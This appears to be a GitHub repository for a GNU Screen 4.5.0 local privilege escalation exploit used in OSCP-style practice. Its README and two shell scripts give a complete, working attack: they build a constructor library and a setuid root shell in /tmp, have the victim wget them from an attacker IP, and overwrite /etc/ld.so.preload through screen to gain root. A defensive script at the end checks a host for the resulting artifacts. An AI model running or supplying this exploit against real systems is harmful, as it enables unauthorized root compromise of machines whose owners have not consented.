├── img
    ├── root.png
    └── Front-img.png
├── README.md
├── full-exploit.sh
└── exploit.sh

/img/root.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/YasserREED/screen-v4.5.0-priv-escalate/HEAD/img/root.png
--------------------------------------------------------------------------------
/img/Front-img.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/YasserREED/screen-v4.5.0-priv-escalate/HEAD/img/Front-img.png
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# screen v4.5.0 Privilege Escalation
`Updated GNU Screen 4.5.0 Exploit:` This repository hosts an enhanced exploit for `GNU Screen 4.5.0` that relates to an OSCP machine. It includes modifications for compatibility with the latest binary configurations in Kali Linux. It is intended for educational and research purposes, to demonstrate privilege escalation.
- The original lib: github-lib and exploit-db
- The original bug report: Bug Report

![](https://img.shields.io/badge/Version-%20v1.0.0-blue)
![](https://img.shields.io/badge/Twitter-%20YasserREED-blue)
![](https://img.shields.io/badge/YouTube-%20YasserRED-red)

## Step-by-step exploit

#### Setup
```bash
sudo git clone https://github.com/YasserREED/screen-v4.5.0-priv-escalate.git
cd screen-v4.5.0-priv-escalate
sudo chmod +x exploit.sh
./exploit.sh
```

#### Transfer the files
```console
victim@Machine$ cd /tmp
victim@Machine$ wget 192.168.45.x/libhax.so
victim@Machine$ wget 192.168.45.x/rootshell
```
#### Give the permissions
```console
victim@Machine$ chmod +x libhax.so
victim@Machine$ chmod +x rootshell
```
#### Smash to root
```bash
cd /etc || exit 1
umask 000
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
```
---

Hack The Planet! :heart_on_fire:

--------------------------------------------------------------------------------
/full-exploit.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)

echo "···············································································································"
echo ": _ _ ____ ___ _ :"
echo ": ___ ___ _ __ ___ ___ _ __ __ __| || | | ___| / _ \ _ __ _ __ (_)__ __ :"
echo ": / __| / __|| '__|/ _ \ / _ \| '_ \ _____\ \ / /| || |_ |___ \ | | | | _____ | '_ \ | '__|| |\ \ / / :"
echo ": \__ \| (__ | | | __/| __/| | | ||_____|\ V / |__ _|_ ___) |_| |_| ||_____|| |_) || | | | \ V / :"
echo ": |___/ \___||_| \___| \___||_| |_| \_/ |_| (_)|____/(_)\___/ | .__/ |_| |_| \_/ :"
echo ": |_| :"
echo ": :"
echo ":··············································································································"

echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include
#include
#include
#include
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c

cat << EOF > /tmp/rootshell.c
#include
#include
#include
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execl("/bin/sh", "sh", NULL);
    return 0;
}
EOF

gcc -o /tmp/rootshell /tmp/rootshell.c -static
rm -f /tmp/rootshell.c

echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc || exit 1 # Exit if change directory fails
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

--------------------------------------------------------------------------------
/exploit.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# Twitter: @YasserREED
# HACK THE PLANET
# ~ infodox (25/1/2017)

echo "···············································································································"
echo ": _ _ ____ ___ _ :"
echo ": ___ ___ _ __ ___ ___ _ __ __ __| || | | ___| / _ \ _ __ _ __ (_)__ __ :"
echo ": / __| / __|| '__|/ _ \ / _ \| '_ \ _____\ \ / /| || |_ |___ \ | | | | _____ | '_ \ | '__|| |\ \ / / :"
echo ": \__ \| (__ | | | __/| __/| | | ||_____|\ V / |__ _|_ ___) |_| |_| ||_____|| |_) || | | | \ V / :"
echo ": |___/ \___||_| \___| \___||_| |_| \_/ |_| (_)|____/(_)\___/ | .__/ |_| |_| \_/ :"
echo ": |_| :"
echo ": :"
echo ": X : @YasserREED :"
echo ":··············································································································"

echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include
#include
#include
#include
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
echo "[+] libhax.c Created .."

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
echo "[+] Create /tmp/libhax.so .."
cat << EOF > /tmp/rootshell.c
#include
#include
#include
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execl("/bin/sh", "sh", NULL);
    return 0;
}
EOF

echo "[+] Create /tmp/rootshell .."
gcc -o /tmp/rootshell /tmp/rootshell.c -static
rm -f /tmp/rootshell.c

echo "[+] Setup Finished!"

echo "[+] Entering /tmp Folder"
cd /tmp || { echo "Failed to enter /tmp folder"; exit 1; }
echo ""
echo "[+] Move libhax.so and rootshell to the Target Machine"
echo ""
echo ""
echo "[Hint] You can use the below command to transfer the files"
echo "[Command] python3 -m http.server 80"

exec /bin/bash
--------------------------------------------------------------------------------
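
For the defender's side of the steps above, an added example (not part of this repository) that triages a host for the artifacts these scripts create: a setuid `screen` reporting version 4.5.0, an `/etc/ld.so.preload` that is world-writable or lists a library under `/tmp`, and setuid files left in `/tmp`. The function names and the `4.05.00` banner format are assumptions.

```shell
#!/bin/bash
# Added defensive example, not part of the repository. Paths are parameters
# so each check can be run against fixtures as well as the live system.

# Succeeds if the file has the setuid bit, which the technique requires of screen.
is_setuid() { [ -u "$1" ]; }

# Succeeds if a `screen --version` banner reports 4.5.0.
# Assumption: that release prints itself as "4.05.00"; "4.5.0" is accepted too.
is_affected_banner() {
    case "$1" in
        *"version 4.05.00"*|*"version 4.5.0"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Prints one finding per line for a preload file (default /etc/ld.so.preload):
# the file being world-writable (the scripts create it under umask 000) and
# any entry that points into a world-writable staging directory.
audit_preload() {
    preload_file="${1:-/etc/ld.so.preload}"
    [ -e "$preload_file" ] || return 0
    if [ -n "$(find "$preload_file" -maxdepth 0 -perm -0002)" ]; then
        echo "world-writable: $preload_file"
    fi
    while IFS= read -r entry || [ -n "$entry" ]; do
        case "$entry" in
            /tmp/*|/var/tmp/*|/dev/shm/*) echo "suspicious entry: $entry" ;;
        esac
    done < "$preload_file"
    return 0
}

# Lists setuid files under a directory (default /tmp). The preload library on
# this page unlinks /etc/ld.so.preload once it has run, so a setuid binary
# left in /tmp is the artifact that persists.
find_setuid_files() {
    find "${1:-/tmp}" -xdev -type f -perm -4000 2>/dev/null
}

# Live-system check, run only when the script is executed with "--live".
if [ "${1:-}" = "--live" ]; then
    bin=$(command -v screen) && is_setuid "$bin" \
        && is_affected_banner "$("$bin" --version)" \
        && echo "setuid screen 4.5.0 present: $bin"
    audit_preload
    find_setuid_files /tmp
fi
```

Where `is_setuid` and `is_affected_banner` both succeed for the installed `screen`, upgrading the package or clearing its setuid bit removes the precondition the scripts rely on.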